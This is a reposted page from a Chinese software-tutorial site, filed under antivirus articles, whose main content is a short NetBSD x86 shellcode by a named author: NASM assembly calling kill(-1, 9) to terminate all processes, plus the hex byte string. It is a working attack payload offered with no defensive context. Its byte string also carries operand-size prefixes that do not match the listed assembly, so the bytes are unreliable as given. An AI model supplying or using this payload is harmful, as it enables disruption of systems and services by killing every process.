当前位置: 首页 > 图文教程 > 网络安全 > 杀毒防毒 > 杀掉进程的shellcode(netbsd/x86)

杀毒防毒
Windows系统中鼠标乱动是否中了病毒
猖狂的Sxs.exe电脑病毒完全清理方法
防止木马最有效果的办法 有效率90%以上
巧妙抓出邮件病毒 合理设置杀毒软件
怎样用安全网关消灭蠕虫病毒
基础知识 计算机病毒是怎么命名的?
木马病毒的启动方式介绍
解密攻破Windows系统加密保护之EFS
重装Windows系统后快速更新病毒库新解
木马Email-Worm.Win32.Rays分析与手动清
江民使你远离“机器狗”病毒侵扰
自己动手,杀掉病毒
用输入法漏洞 轻松破解登录Vista
巧妙删除文件
新挂马方式开始流行 ARP挂马称雄局域网
卡巴斯基(AVP)内存驻留型病毒检测方法
卡巴斯基防火墙“反黑客”的设置技巧
守好防毒第一关 趋势科技2008试用测评
简单且高效 NOD32杀毒软件新版试用评测
六大亮点 金山毒霸2008正式版试用手记

杀毒防毒 中的 杀掉进程的shellcode(netbsd/x86)


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-20   浏览: 56 ::
收藏到网摘: n/a

  /*

  netbsd/x86 kill all processes shellcode

  author Teo Manojlovic

  contact [email protected]

  this shellcode is using syscall number 37 or 0x25

  37 STD { int sys_kill(int pid, int signum); }

  here is assembler code using intel syntaxe and NASM

  --------------begin-----------

  section .note.netbsd.ident

  dd0x07,0x04,0x01

  db"NetBSD",0x00,0x00

  dd200000000

  section .data

  section .text

  global _start

  _start:

  xor eax, eax

  push 0x09

  mov eax, -1

  push eax

  xor eax,eax

  mov al, 37

  push eax

  int 0x80

  -------------------------end------------

  if we dissasemble this code wi will get shellcode

  "\x66\x31\xc0\x68\x09\x00\x66\xb8\xff\xff\xff\xff\x66\x50\x66\x31\xc0\xb0\x25\x66\x50\xcd\x80"

  */